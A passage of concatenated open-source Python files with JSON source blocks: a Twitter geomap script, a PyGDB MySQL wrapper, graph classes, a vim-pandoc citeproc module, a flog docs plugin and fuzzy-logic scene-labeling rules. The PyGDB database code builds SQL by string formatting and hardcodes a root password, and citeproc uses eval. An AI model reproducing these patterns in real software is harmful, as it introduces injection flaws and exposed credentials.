geo_json_feature = get_geojson_feature(tweet['coordinates'], tweet['text'], tweet['created_at'])
geo_data['features'].append(geo_json_feature)
else:
if tweet['user']['location'] is not None:
if ',' in tweet['user']['location']:
geo_location = geolocator.geocode(tweet['user']['location'], timeout=None)
if geo_location is not None:
geo_shif_val = random.randint(1, 9) / 1000000
tweet_coords = [geo_location.longitude - geo_shif_val, geo_location.latitude - geo_shif_val]
coords_objt = {"type": "Point", "coordinates": tweet_coords}
geo_json_feature = get_geojson_feature(coords_objt, tweet['text'], tweet['created_at'])
geo_data['features'].append(geo_json_feature)
# Save geo data
with open(geo_json_dir + 'geo_data.json', 'w') as fout:
fout.write(json.dumps(geo_data, indent=4))
fout.close()
print('Geojson file has been built! Opening browser to view map and exiting...')
# Open geomap html file in user's default webbrowser
local_url = browser_map_dir + 'twitter_geomap.html'
webbrowser.open('file://' + local_url, new=2)
```
|
{
"source": "Jecvay/PyGDB",
"score": 2
}
|
#### File: PyGDB/gdblib/TimedMessage.py
```python
import sys
import time
class TimedMessage:
logging = 0
def __init__(self, message):
self.start = time.time()
self.message = message
self.outcome = "aborted"
if self.logging:
print self.message + "..."
sys.stdout.flush()
def __del__(self):
if self.logging:
try:
print self.message + "..." + self.outcome + ". (" + \
'%.1f' % (time.time() - self.start) + "s)"
sys.stdout.flush()
except:
pass
```
#### File: Jecvay/PyGDB/PyGdbDb.py
```python
import pymysql
import PyGdbUtil
class PyGdbDb:
# 初始化: 连接数据库
def __init__(self, host, port, dbname, user, passwd):
self.project = None
self.table_prefix = None
try:
self.connection = pymysql.connect(
host=host, port=int(port), user=user, password=<PASSWORD>, db=dbname, charset="utf8mb4")
self.cursor = self.connection.cursor()
except Exception as e_con:
print '数据库连接错误, 程序中止'
print e_con
exit(-1)
def test(self):
print '正在测试数据库连接'
print '数据库连接: ' + str(self.connection.get_host_info()) if self.connection else '数据库连接异常'
print '数据库游标: ' + str(self.cursor) if self.cursor else '数据库游标异常'
print '数据库连接测试完毕'
print '检查表 aabb 是否存在'
if self.exist_table('aabb'):
print '存在'
else:
print '不存在'
print '初始化项目 example'
self.init_project('example', 'example_')
self.new_project()
PyGdbUtil.log(0, '初始化完毕')
# 初始化项目
def init_project(self, project_name, table_prefix):
self.project = project_name
self.table_prefix = table_prefix
# 检测是否存在该项目 不存在->创建 返回True; 存在->返回 False
def new_project(self):
if not self.table_prefix:
PyGdbUtil.log(2, '未指定数据库前缀')
exist_project = self.exist_table(self.table_prefix + 'BreakPoint')
# 创建数据库表
if not exist_project:
self.create_table(self.table_prefix + "BreakPoint(bid INT AUTO_INCREMENT primary key, pid INT, lineNumber INT, funcName TEXT, funcList TEXT)")
self.create_table(self.table_prefix + "PStackSize(pid INT, tid INT, stackSize INT, pass TINYINT)")
self.create_table(self.table_prefix + "FStackSize(pid INT, tid INT, fid INT, stackSize INT)")
self.create_table(self.table_prefix + "FrameVariable(bid INT, varName CHAR, varValue TEXT, varSize INT)")
self.create_table(self.table_prefix + "FuncAdjacencyList(pid INT, tid INT, parFid INT, fid INT, cnt INT)")
self.create_table(self.table_prefix + "Function(fid INT, funcName CHAR(30))")
self.create_table(self.table_prefix + "TestCase(tid INT AUTO_INCREMENT primary key, testStr TEXT)")
self.commit()
return True
else:
return False
def clear_project(self):
if not self.table_prefix:
PyGdbUtil.log(2, '未指定数据库前缀')
exist_project = self.exist_table(self.table_prefix + 'BreakPoint')
if exist_project:
self.drop_table(self.table_prefix + "BreakPoint")
self.drop_table(self.table_prefix + "PStackSize")
self.drop_table(self.table_prefix + "FStackSize")
self.drop_table(self.table_prefix + "FrameVariable")
self.drop_table(self.table_prefix + "FuncAdjacencyList")
self.drop_table(self.table_prefix + "Function")
self.drop_table(self.table_prefix + "TestCase")
self.commit()
return True
else:
return False
# 插入测试用例
def insert_test_case(self, test_str):
self.execute("insert into " + self.table_prefix + "TestCase(testStr) VALUES('%s')" % test_str)
# 插入程序断点
def insert_breakpoint(self, pid, line_number, func_name):
# return # 测试
PyGdbUtil.log(0, str(pid) + " " + str(line_number) + " " + str(func_name))
self.execute("insert into " + self.table_prefix +
"BreakPoint(pid, lineNumber, funcName) VALUES (%s, %s, '%s')" % (pid, line_number, func_name))
# 插入函数
def inset_function(self, fid, func_name):
self.execute('insert into ' + self.table_prefix +
'Function(fid, funcName) VALUES (%s, "%s")' % (fid, func_name))
# 插入一个栈帧变量信息
def insert_frame_var(self, bid, var_name, var_value, var_size):
self.execute('insert into ' + self.table_prefix +
'FrameVariable(bid, varName, varValue, varSize) ' +
'VALUES (%s, "%s", "%s", %s)' % (bid, var_name, var_value, var_size))
# 插入栈帧大小
def insert_frame_stack_size(self, pid, tid, fid, size):
self.execute('insert into ' + self.table_prefix +
'FStackSize(pid, tid, fid, stackSize) VALUES (%s, %s, %s, %s)' %
(pid, tid, fid, size))
# 插入最大栈帧大小
def insert_max_stack_size(self, pid, tid, size):
self.execute('insert into ' + self.table_prefix +
'PStackSize(pid, tid, stackSize) VALUES (%s, %s, %s)' %(pid, tid, size))
# 根据函数名称获取 fid
def get_function_fid_by_name(self, func_name):
self.execute('select fid from ' + self.table_prefix + 'Function where funcName=' + func_name)
fetch_one = self.cursor.fetchone()
print "获取函数id: " + fetch_one
return fetch_one[0]
# 根据bid获取fid
def get_fid_by_bid(self, bid):
self.execute('select funcName from ' + self.table_prefix + 'BreakPoint where bid=' + str(bid))
fetch_one = self.cursor.fetchone()
fid = self.get_fid_by_func_name(str(fetch_one[0]))
return fid
# 根据函数名获取 fid
def get_fid_by_func_name(self, func_name):
self.execute('select fid from ' + self.table_prefix + 'Function where funcName="%s"' % (str(func_name)))
return self.cursor.fetchone()[0]
# 数据库中插入断点
def info_breakpoint_handler(self, pid, gdb_info_breakpoint):
ss = gdb_info_breakpoint.split("\n")
for s in ss:
if 0 < s.find("breakpoint keep y"):
s2 = s.split()
s3 = s2[8].split(":")
self.insert_breakpoint(pid, s3[1], s2[6])
# 添加有向边 a-->b
def insert_edge(self, pid, tid, func_name_a, func_name_b):
fid_a = self.get_fid_by_func_name(func_name_a)
fid_b = self.get_fid_by_func_name(func_name_b)
try:
self.execute('select cnt from ' + self.table_prefix +
'FuncAdjacencyList where pid=%s and tid=%s and parFid=%s and fid=%s' %
(pid, tid, fid_a, fid_b))
cnt = int(self.cursor.fetchone()[0]) + 1
self.execute('update ' + self.table_prefix +
'FuncAdjacencyList set cnt=%s where pid=%s and tid=%s and parFid=%s and fid=%s' %
(pid, tid, cnt, fid_a, fid_b))
except Exception:
cnt = 1
self.execute('insert into ' + self.table_prefix +
'FuncAdjacencyList(pid, tid, parFid, fid, cnt) VALUES (%s, %s, %s, %s, %s)' %
(pid, tid, fid_a, fid_b, cnt))
# 根据 gdb(info b) 的信息获取函数列表
def get_function_list(self, break_info):
func_list = []
string_list = break_info.split('\n')[1:]
for line in string_list:
word = line.split()
if len(word) >= 6:
func_list.append(word[6])
return func_list
# 将给出的函数列表插入数据库中
def insert_function_list(self, func_list):
fid = 0
func_list = list(set(func_list)) # 去重
for func in func_list:
fid += 1
self.inset_function(fid, func)
# 检查是否存在一张表
def exist_table(self, table_name):
try:
self.execute('select * from ' + table_name)
return True
except Exception:
return False
# 创建表
def create_table(self, table_name):
try:
PyGdbUtil.log(0, "创建表" + table_name)
self.execute("create table if not exists " + table_name)
except Exception as e:
# print e
PyGdbUtil.log(2, "创建表" + table_name + "失败! 请检查数据表前缀是否有非法字符.")
# 删除表
def drop_table(self, table_name):
try:
PyGdbUtil.log(0, "删除表" + table_name)
self.execute('drop table if exists ' + table_name)
except Exception as e:
print e
PyGdbUtil.log(2, '删除表失败!')
# 获取测试样例
def get_test_case_by_tid(self, tid):
self.execute("SELECT testStr FROM " + self.table_prefix + "TestCase WHERE tid='%s'" % tid)
return self.cursor.fetchone()[0]
# 获取测试样例总数
def get_test_case_cnt(self):
self.execute('SELECT max(tid) FROM ' + self.table_prefix + 'TestCase')
return int(self.cursor.fetchone()[0])
# 获取指定程序的断点列表
def get_breakpoint_list(self, pid):
self.execute('SELECT lineNumber FROM ' + self.table_prefix + 'BreakPoint WHERE pid="%s"' % pid)
all = self.cursor.fetchall()
return [x[0] for x in all]
# 执行 sql 语句
def execute(self, sql_cmd):
return self.cursor.execute(sql_cmd)
# commit 操作
def commit(self):
self.connection.commit()
"""
==================================================================
下方是 RestFul API 直接需要用到的 api
我擦, 这个好像应该放到另一个工程里面 - -#
==================================================================
"""
# getWorstStackSize(String program String t1){} input1+program getWorstStackSize(){}
# tid + pid --> Worst Stack Size
def api_worst_stack_size(self, pid, tid):
pass
def api_max_stack_size(self, pid, tid, fid):
pass
# 给出正确程序的pid 以及比较程序的 pid, 以及测试用例集合(tid列表), 返回程序执行成功与否的TF表
def api_result(self, correct_pid, test_pid, tid_list):
pass
# 返回程序断点列表
def api_breakpoint_list(self, pid, tid):
pass
# 断点处函数栈列表
def api_breakpoint_func_list(self, pid, breakpoint):
pass
# 断点处栈帧信息
def api_breakpoint_frame_info(self, pid, breakpoint):
pass
# 返回函数调用图的邻接表
def api_function_graph(self, pid, tid):
pass
# 返回函数列表
def api_function_list(self, pid):
pass
if __name__ == '__main__':
print "PyGDB Database 测试模式"
try:
dbc = PyGdbDb('127.0.0.1', '3306', 'pygdb', 'root', 'Sbdljw1992')
print '数据库连接成功'
dbc.test()
dbc.connection.close()
print '数据库连接断开成功'
except Exception as e:
print '严重错误: ' + str(e)
exit(-1)
```
|
{
"source": "je-c/Visualising-Graph-Traversals",
"score": 4
}
|
#### File: Visualising-Graph-Traversals/graph/edge.py
```python
class Edge:
"""
Edge Class
----------
Represents the edge between two vertices
Attributes:
* u (Vertex): The vertex connected.
* v (Vertex): The vertex connected.
"""
def __init__(self, u, v):
"""
Initialises the edge with two vertices
* :param u (Vertex): Vertex U connected with this edge.
* :param v (Vertex): Vertex V connected with this edge.
"""
self.u = u
self.v = v
def __eq__(self, other):
"""
Overrides the base equality so we can check that
two edges are equal to each other.
* :param other: The other object we are comparing
:return: Bool if equal
"""
# If it's the same class, then it should have the same vertices.
if isinstance(other, Edge):
return (other.u == self.v or other.u == self.u) \
and (other.v == self.u or other.v == self.v)
# If it's not the same class, it's not equal
return False
def __repr__(self):
"""
Defines the string representation of the edge.
"""
return "<{}-{}>".format(self.u, self.v)
def __hash__(self):
"""
Makes the class hashable
"""
return hash(repr(self))
```
#### File: Visualising-Graph-Traversals/graph/vertex.py
```python
class Vertex:
"""
Vertex Class
-------------
Represents an object on the map, with an X position and Y position.
Attributes:
* x_pos (float): The X position of the vertex.
* y_pos (float): The Y position of the vertex.
* edges (list) : The list of edges where this node is connected.
"""
def __init__(self, x_pos, y_pos, name='non-spec'):
"""
Initialises the vertex on the map.
* :param x_pos: The X position of this vertex on interval(-infinity <= x_pos <= infinity)
* :param y_pos: The Y position of this vertex on interval(-infinity <= y_pos <= infinity)
Argument Types:
:type x_pos: float
:type y_pos: float
"""
self.x_pos = x_pos
self.y_pos = y_pos
self.name = name
self.edges = []
def __eq__(self, other):
"""
Overriding the equality.
* :param other: The other object comaparing to.
:return: Bool if equal
"""
if isinstance(other, Vertex):
return other.x_pos == self.x_pos and other.y_pos == self.y_pos
return False
def __ne__(self, other):
"""
Implementing the not equal method. (vertex != other vertex)
* :param other: The other object to compare to.
:return: The bool if not equal.
"""
if isinstance(other, Vertex):
return other.x_pos != self.x_pos or other.y_pos != self.y_pos
return True
def __repr__(self):
"""
Defines the string representation of the object.
"""
return "V({}, {})".format(self.x_pos, self.y_pos)
def __hash__(self):
"""
Makes the object hashable.
"""
return hash(repr(self))
def add_edge(self, e):
"""
Adds the edge e to the set of edges.
* :param e: The new edge to add.
"""
self.edges.append(e)
def remove_edge(self, e):
"""
Removes the edge from the set of edges.
* :param e: The edge to remove.
"""
self.edges.remove(e)
def move_vertex(self, x_pos, y_pos):
"""
Sets the new position of the vertex.
* :param x_pos (float): The new X position of the vertex.
* :param y_pos (float): The new Y position of the vertex.
"""
self.x_pos = x_pos
self.y_pos = y_pos
```
|
{
"source": "jecxjo/dotfiles",
"score": 2
}
|
#### File: vim_pandoc/bib/citeproc.py
```python
from subprocess import check_output
import json
import re
try:
from vim_pandoc.bib.collator import SourceCollator
from vim_pandoc.bib.util import flatten
except:
from collator import SourceCollator
from util import flatten
# _bib_extensions {{{1
# Filetypes that citeproc.py will attempt to parse.
_bib_extensions = ["bib",\
"bibtex",\
"ris",\
"mods",\
"json",\
"enl",\
"wos",\
"medline",\
"copac",\
"xml"]
# _significant_tags {{{1
# Tags that citeproc.py will search in, together with scaling
# factors for relative importance. These are currently non-functional.
_significant_tags = {"id": 0.5,
"author": 1.0,
"issued": 1.0,
"title": 1.0,
"publisher": 1.0,
"abstract": 0.1}
# _variable_type {{{1
# Map of tags -> types.
_variable_type = {
"abstract": "plain",
"annote": "plain",
"archive": "plain",
"archive_location": "plain",
"archive-place": "plain",
"authority": "plain",
"call-number": "plain",
"citation-label": "plain",
"citation-number": "plain",
"collection-title": "plain",
"container-title": "plain",
"container-title-short": "plain",
"dimensions": "plain",
"doi": "plain",
"event": "plain",
"event-place": "plain",
"first-reference-note-number": "plain",
"genre": "plain",
"isbn": "plain",
"issn": "plain",
"jurisdiction": "plain",
"keyword": "plain",
"locator": "plain",
"medium": "plain",
"note": "plain",
"original-publisher": "plain",
"original-publisher-place": "plain",
"original-title": "plain",
"page": "plain",
"page-first": "plain",
"pmcid": "plain",
"pmid": "plain",
"publisher": "plain",
"publisher-place": "plain",
"references": "plain",
"reviewed-title": "plain",
"scale": "plain",
"section": "plain",
"source": "plain",
"status": "plain",
"title": "plain",
"title-short": "plain",
"url": "plain",
"version": "plain",
"year-suffix": "plain",
"chapter-number": "number",
"collection-number": "number",
"edition": "number",
"issue": "number",
"number": "number",
"number-of-pages": "number",
"number-of-volumes": "number",
"volume": "number",
"accessed": "date",
"container": "date",
"event-date": "date",
"issued": "date",
"original-date": "date",
"submitted": "date",
"author": "name",
"collection-editor": "name",
"composer": "name",
"container-author": "name",
"director": "name",
"editor": "name",
"editorial-director": "name",
"illustrator": "name",
"interviewer": "name",
"original-author": "name",
"recipient": "name",
"reviewed-author": "name",
"translator": "name"
}
class CSLItem: #{{{1
# This class implements various helper methods for CSL-JSON formatted bibliography
# entries.
def __init__(self, entry): #{{{2
self.data = entry
def as_array(self, variable_name): #{{{2
def plain(variable_contents): #{{{3
# Takes the contents of a 'plain' variable and splits it into an array.
return unicode(variable_contents).split('\n')
def number(variable_contents): #{{{3
return [unicode(variable_contents)]
def name(variable_contents): #{{{3
# Parses "name" CSL Variables and returns an array of names.
def surname(author):
# Concat dropping particle and non-dropping particle with family name.
return [" ".join((author.get("dropping-particle", ""),
author.get("non-dropping-particle", ""),
author.get("family", ""))).strip()]
def given_names(author):
return [author.get("given", "").strip()]
def literal_name(author):
# It seems likely there is some particular reason for the author being
# a literal, so don't try and do clever stuff like splitting into tokens...
return [author.get("literal", "").strip()]
names = []
for author in variable_contents:
name = ""
if "literal" in author:
name = literal_name(author)
else:
name = surname(author) + given_names(author)
names.append(name)
return names
def date(variable_contents): #{{{3
# Currently a placeholder. Will parse 'date' CSL variables and return an array of
# strings for matches.
def date_parse(raw_date_array):
# Presently, this function returns the date in yyyy-mm-dd format. In future, it
# will provide a variety of alternative forms.
date = [unicode(x) for x in raw_date_array]
return ["-".join(date)]
def date_parts(date_parts_contents):
# Call date_parts for each element.
response = []
for date in date_parts_contents:
response.extend(date_parse(date))
return response
def season(season_type):
# Not actually clear from the spec what is meant to go in here. Zotero doesn't
# 'do' seasons, and I can't work it out from the pandoc-citeproc source. Will
# try and make this work when I have useful internet
season_lookup = {1: "spring",
2: "summer",
3: "autumn",
4: "winter"}
return []
def circa(circa_boolean):
return []
def literal(date_string):
return [date_string]
date_function_lookup = {"date-parts": date_parts,
"season": season,
"circa": circa,
"literal": literal,
"raw": literal}
response = []
for element in variable_contents:
response.extend(date_function_lookup[element](variable_contents[element]))
return response
# }}}3
variable_contents = self.data.get(variable_name, False)
if variable_contents:
return eval(_variable_type.get(variable_name, "plain"))(variable_contents)
else:
return []
def match(self, query): #{{{2
# Matching engine. Returns 1 if match found, 0 otherwise.
# Expects query to be a compiled regexp.
# Very simple, just searches for substrings. Could be updated
# to provide a 'matches' value for ranking? Using numbers here
# so as to permit this future application.
matched = False
for variable in _significant_tags:
for token in self.as_array(variable):
matched = matched or query.search(flatten(token))
if matched:
break
if matched:
return 1
else:
return 0
def matches(self, query): #{{{2
# Provides a boolean match response to query.
# Expects query to be a compiled regexp.
if self.match(query) == 0:
return False
else:
return True
def relevance(self, query): #{{{2
# Returns the relevance of an item for a query
query = re.compile(query, re.I)
relevance = float(0.0)
tags_matched = []
for tag in _significant_tags:
for token in self.as_array(tag):
if query.search(flatten(token)):
tags_matched.append(tag)
break
if tags_matched != []:
relevance = sum([_significant_tags[t] for t in tags_matched])
return relevance
class CiteprocSource: #{{{1
def __init__(self, bib): #{{{2
try:
raw_bib = json.loads(check_output(["pandoc-citeproc", "-j", bib]))
except:
raw_bib = []
self.data = [CSLItem(entry) for entry in raw_bib]
def __iter__(self): #{{{2
for a in self.data:
yield a
class CiteprocCollator(SourceCollator): #{{{1
def collate(self): #{{{2
data = []
for bib in self.find_bibfiles():
for item in CiteprocSource(bib):
if item.matches(re.compile(self.query, re.I)) and item not in data:
data.append(item)
data.sort(key=lambda i: i.relevance(self.query), reverse=True)
return [item.data for item in data]
```
|
{
"source": "jedahu/flog",
"score": 2
}
|
#### File: plugins/projects/__init__.py
```python
import asciicode
import asciidoc
import flask
import mimetypes
import os
import urlparse
from StringIO import StringIO
from flog.mime import mimetype
TEXT_MIMES = set([
'application/javascript'
])
class Plugin:
def __init__(self, app, conf):
self.app = app
self.root = conf['root']
self.text_mimes = set(conf.get('text_mimes', []))
self.text_mimes.update(TEXT_MIMES)
self.projects = conf['projects']
for name, val in self.projects.items():
if type(val) in (str, unicode):
projects[name] = val = dict(source=val)
val['index'] = val.get('index', 'README')
val['manifest'] = val.get('manifest', 'doc_manifest')
val['commit'] = val.get('commit', 'master')
val['text_mimes'] = val.get('text_mimes', [])
def asciicode_or_redirect(self, commit, url_path, project=None, name=None):
index = None
if url_path == '' or url_path.endswith('/'):
index = project['index']
url_path = os.path.join(url_path, index)
full_url = os.path.join(project['source'].format(commit=commit), url_path)
base_url = '/' + os.path.join(self.root, name, commit)
manifest = []
paths = []
try:
manifest = self.manifest_list(project, name, commit)
paths = [x[1] for x in manifest if x[0] == 'path']
except Exception, e:
print 'projects plugin: no manifest list found:', e
@mimetype('text/html')
@self.app.source(full_url)
def asciicode_impl(src):
asciidoc_fn = self.asciicode_asciidoc()
log = []
args = dict(
inpath=full_url,
attrs=dict(flog_source_url_path=os.path.split(
os.path.join(base_url, url_path))[0].encode('utf-8')),
log_names=['name', 'section'],
log=log)
f = StringIO(src)
pos = f.tell()
first = unicode(f.read(3), 'utf-8')
if u'\ufeff' != first:
f.seek(pos)
html = asciicode.process_string(asciidoc_fn, f, asciidoc_args=args).getvalue()
if type(html) is not unicode:
html = unicode(html, 'utf-8')
current_path = url_path
if url_path == '' or url_path.endswith('/'):
current_path = os.path.join(url_path, index)
names = [x[1]['target'] for x in log if x[0] == 'name']
headings = [x[1] for x in log if x[0] == 'section' and x[1]['level'] > 0]
github_info = {}
url_bits = urlparse.urlparse(full_url)
if url_bits.hostname == 'raw.github.com':
user, repo = url_bits.path[1:].split('/')[:2]
github_info = dict(user=user, repo=repo)
return flask.render_template('project.html',
prefix=os.path.join('/', self.root, name),
title=project.get('title', name),
current_path=current_path,
content=flask.Markup(html),
manifest=manifest,
headings=headings,
names=names,
commit=commit,
github_info=github_info)
mime, _ = mimetypes.guess_type(url_path, strict=False)
if ((mime and mime.startswith('text'))
or mime in self.text_mimes
or mime in project['text_mimes']
or url_path in paths):
return asciicode_impl()
return flask.redirect(full_url)
def asciicode_asciidoc(self):
c = self.app.config
def execute(infile, outfile, attrs={}, conf_files=[], **kwargs):
attrs.update({
'pygments': 'pygments',
'filter-modules': 'asciicode'
})
kwargs['attrs'] = attrs
default_conf_files = [c.ASCIIDOC_FLOG_CONF]
if c.ASCIIDOC_CONF:
default_conf_files.append(c.ASCIIDOC_CONF)
default_conf_files.append(os.path.join(os.path.dirname(__file__), 'asciidoc-html5.conf'))
kwargs['conf_files'] = default_conf_files + conf_files
asciidoc.execute(infile, outfile, **kwargs)
return execute
def asciicode_docs(self, name, commit, path):
if name not in self.projects:
return abort(404)
proj = self.projects[name]
return self.asciicode_or_redirect(commit, path, project=proj, name=name)
def asciicode_docs_index(self, name, commit):
if name not in self.projects:
return abort(404)
proj = self.projects[name]
return self.asciicode_or_redirect(commit, '', project=proj, name=name)
def asciicode_docs_prefix(self, name):
if name not in self.projects:
return abort(404)
proj = self.projects[name]
return flask.redirect(flask.url_for('asciicode_docs_index', name=name, commit=proj['commit']))
def manifest_list(self, project, name, commit):
manifest = project['manifest']
manifest_url = os.path.join(project['source'].format(commit=commit), project['manifest'])
@self.app.source(manifest_url)
def manifest_list_impl(src):
def filter(x):
return x.strip() != ''
def morph(x):
if x.startswith('= '):
return ('heading', x.strip()[2:])
return ('path', x.strip())
return [morph(x) for x in src.splitlines() if filter(x)]
return manifest_list_impl()
def init_for_flog(app, plug_conf):
plug = Plugin(app, plug_conf)
app.add_url_rule(
os.path.join('/' + plug.root, '<string:name>/'),
'asciicode_docs_prefix',
lambda name: plug.asciicode_docs_prefix(name))
app.add_url_rule(
os.path.join('/' + plug.root, '<string:name>', '<string:commit>/'),
'asciicode_docs_index',
lambda name, commit: plug.asciicode_docs_index(name, commit))
app.add_url_rule(
os.path.join('/' + plug.root, '<string:name>', '<string:commit>', '<path:path>'),
'asciicode_docs',
lambda name, commit, path: plug.asciicode_docs(name, commit, path))
```
|
{
"source": "jedavis82/scene_labeling",
"score": 3
}
|
#### File: scene_labeling/input/import_coco.py
```python
import fiftyone as fo
import fiftyone.zoo as foz
import os
import shutil
DATASET_DIR = './'
TRAIN_DIR = DATASET_DIR + 'coco-2017/train/data/'
VAL_DIR = DATASET_DIR + 'coco-2017/validation/data/'
OUTPUT_DIR = DATASET_DIR + 'coco_images/'
if not os.path.exists(DATASET_DIR):
os.makedirs(DATASET_DIR)
if not os.path.exists(OUTPUT_DIR):
os.makedirs(OUTPUT_DIR)
def main():
fo.config.dataset_zoo_dir = DATASET_DIR # Specify the output directory of the downloaded files
print(fo.config) # Verify the settings were updated correctly
dataset = foz.load_zoo_dataset(
"coco-2017",
splits=["train", "validation"],
classes=["person"],
label_types="detections",
max_samples=2000,
include_license=False
)
# Combine the training and validation images into one directory. Remove the JSON annotated files.
# This code performs object detection using YOLOv3 and does not rely on the annotations
train_images = os.listdir(TRAIN_DIR)
val_images = os.listdir(VAL_DIR)
for f in train_images:
shutil.move(os.path.join(TRAIN_DIR, f), OUTPUT_DIR)
for f in val_images:
shutil.move(os.path.join(VAL_DIR, f), OUTPUT_DIR)
# Clean up the downloaded annotation files
shutil.rmtree(DATASET_DIR + 'coco-2017/')
if __name__ == '__main__':
main()
```
#### File: scene_labeling/level_two_utils/electronics.py
```python
from skfuzzy import control as ctrl
import skfuzzy as fuzz
import numpy as np
from fuzzy_utils import create_universes_membership_functions
class ElectronicsRules:
def __init__(self, show_sim_result=None):
prox, over, spat = create_universes_membership_functions()
self.__show_sim_result = show_sim_result
self.__proximity = prox
self.__overlap = over
self.__spatial_relationships = spat
self.__create_universes_of_discourse()
self.__create_membership_functions()
self.__create_tv_rules()
self.__create_cell_phone_rules()
self.__create_device_rules()
def __create_universes_of_discourse(self):
"""
Universe of discourse:
TV: watching, not watching
Cell Phone: talking on, not talking on
Small Device: using, not using
"""
self.__tv_interaction = ctrl.Consequent(universe=np.arange(-0.1, 1.1, 0.1), label='tv_interaction')
self.__cell_phone_interaction = ctrl.Consequent(universe=np.arange(-0.1, 1.1, 0.1),
label='cell_phone_interaction')
self.__device_interaction = ctrl.Consequent(universe=np.arange(-0.1, 1.1, 0.1), label='device_interaction')
def __create_membership_functions(self):
self.__tv_interaction['Watching'] = fuzz.trimf(self.__tv_interaction.universe, [0.4, 0.7, 1.0])
self.__tv_interaction['Not Watching'] = fuzz.trimf(self.__tv_interaction.universe, [0.0, 0.3, 0.6])
self.__cell_phone_interaction['Talking On'] = fuzz.trimf(self.__cell_phone_interaction.universe,
[0.4, 0.7, 1.0])
self.__cell_phone_interaction['Not Talking On'] = fuzz.trimf(self.__cell_phone_interaction.universe,
[0.0, 0.3, 0.6])
self.__device_interaction['Using'] = fuzz.trimf(self.__device_interaction.universe, [0.4, 0.7, 1.0])
self.__device_interaction['Not Using'] = fuzz.trimf(self.__device_interaction.universe, [0.0, 0.3, 0.6])
def __create_tv_rules(self):
# If overlap AND very close OR close OR medium THEN watching
self.__watching_rule1 = ctrl.Rule(self.__overlap['Overlap'] &
(self.__proximity['Very Close'] | self.__proximity['Close'] |
self.__proximity['Medium']), self.__tv_interaction['Watching'])
# IF no overlap AND very close OR close THEN watching
self.__watching_rule2 = ctrl.Rule(self.__overlap['No Overlap'] &
(self.__proximity['Very Close'] | self.__proximity['Close']
| self.__proximity['Medium']),
self.__tv_interaction['Watching'])
# IF overlap AND far OR very far THEN not watching
self.__not_watching_rule1 = ctrl.Rule(self.__overlap['Overlap'] &
(self.__proximity['Far'] | self.__proximity['Very Far']),
self.__tv_interaction['Not Watching'])
# IF no overlap AND medium OR far OR very far THEN not watching
self.__not_watching_rule2 = ctrl.Rule(self.__overlap['No Overlap'] &
(self.__proximity['Far'] |
self.__proximity['Very Far']), self.__tv_interaction['Not Watching'])
self.__watching_ctrl = ctrl.ControlSystem([self.__watching_rule1, self.__watching_rule2,
self.__not_watching_rule1, self.__not_watching_rule2])
self.__watching_sim = ctrl.ControlSystemSimulation(self.__watching_ctrl, flush_after_run=100)
def __create_cell_phone_rules(self):
# IF overlap AND very close OR close THEN talking
self.__talking_rule1 = ctrl.Rule(self.__overlap['Overlap'] &
(self.__proximity['Very Close'] | self.__proximity['Close']),
self.__cell_phone_interaction['Talking On'])
# IF overlap AND medium OR far OR very far THEN not talking
self.__not_talking_rule1 = ctrl.Rule(self.__overlap['Overlap'] &
(self.__proximity['Medium'] | self.__proximity['Far'] |
self.__proximity['Very Far']),
self.__cell_phone_interaction['Not Talking On'])
# IF no overlap THEN not talking
self.__not_talking_rule2 = ctrl.Rule(self.__overlap['No Overlap'],
self.__cell_phone_interaction['Not Talking On'])
self.__talking_ctrl = ctrl.ControlSystem([self.__talking_rule1, self.__not_talking_rule1,
self.__not_talking_rule2])
self.__talking_sim = ctrl.ControlSystemSimulation(self.__talking_ctrl, flush_after_run=100)
def __create_device_rules(self):
# IF overlap OR no overlap AND very close OR close AND left OR above left OR above OR above right OR right
# THEN using
self.__using_rule1 = ctrl.Rule((self.__proximity['Very Close'] | self.__proximity['Close']) &
(self.__spatial_relationships['Right1'] |
self.__spatial_relationships['Right2'] |
self.__spatial_relationships['Above Right'] |
self.__spatial_relationships['Above'] |
self.__spatial_relationships['Above Left'] |
self.__spatial_relationships['Left']), self.__device_interaction['Using'])
# IF overlap AND very close OR close THEN using
self.__using_rule2 = ctrl.Rule(self.__overlap['Overlap'] &
(self.__proximity['Very Close'] | self.__proximity['Close']),
self.__device_interaction['Using'])
# IF overlap OR no overlap AND medium OR far OR very far AND any sr THEN not using
self.__not_using_rule1 = ctrl.Rule((self.__proximity['Medium'] | self.__proximity['Far'] |
self.__proximity['Very Far']),
self.__device_interaction['Not Using'])
# IF very close OR close AND below left OR below OR below right THEN not using
self.__not_using_rule2 = ctrl.Rule(self.__overlap['No Overlap'] &
(self.__proximity['Very Close'] | self.__proximity['Close']) &
(self.__spatial_relationships['Below Left'] |
self.__spatial_relationships['Below'] |
self.__spatial_relationships['Below Right']),
self.__device_interaction['Not Using'])
self.__using_ctrl = ctrl.ControlSystem([self.__using_rule1, self.__using_rule2,
self.__not_using_rule1, self.__not_using_rule2])
self.__using_sim = ctrl.ControlSystemSimulation(self.__using_ctrl, flush_after_run=100)
def compute_tv_interaction(self, giou, iou, sr_angle):
self.__watching_sim.input['proximity'] = giou
self.__watching_sim.input['overlap'] = iou
self.__watching_sim.compute()
watching_result = self.__watching_sim.output['tv_interaction']
if self.__show_sim_result:
self.__tv_interaction.view(sim=self.__watching_sim)
watching = fuzz.interp_membership(self.__tv_interaction.universe, self.__tv_interaction['Watching'].mf,
watching_result)
not_watching = fuzz.interp_membership(self.__tv_interaction.universe, self.__tv_interaction['Not Watching'].mf,
watching_result)
membership = {'Watching': watching, 'Not Watching': not_watching}
ret_label = max(membership, key=membership.get)
if ret_label == 'Not Watching':
return None
else:
return ret_label
def compute_cell_phone_interaction(self, giou, iou, sr_angle):
self.__talking_sim.input['overlap'] = iou
self.__talking_sim.input['proximity'] = giou
self.__talking_sim.compute()
talking_result = self.__talking_sim.output['cell_phone_interaction']
if self.__show_sim_result:
self.__cell_phone_interaction.view(sim=self.__talking_sim)
talking = fuzz.interp_membership(self.__cell_phone_interaction.universe,
self.__cell_phone_interaction['Talking On'].mf, talking_result)
not_talking = fuzz.interp_membership(self.__cell_phone_interaction.universe,
self.__cell_phone_interaction['Not Talking On'].mf, talking_result)
membership = {'Talking On': talking, 'Not Talking On': not_talking}
ret_label = max(membership, key=membership.get)
if ret_label == 'Not Talking On':
return None
else:
return ret_label
def compute_device_interaction(self, giou, iou, sr_angle):
self.__using_sim.input['proximity'] = giou
self.__using_sim.input['overlap'] = iou
self.__using_sim.input['spatial_relationships'] = sr_angle
self.__using_sim.compute()
using_result = self.__using_sim.output['device_interaction']
if self.__show_sim_result:
self.__device_interaction.view(sim=self.__using_sim)
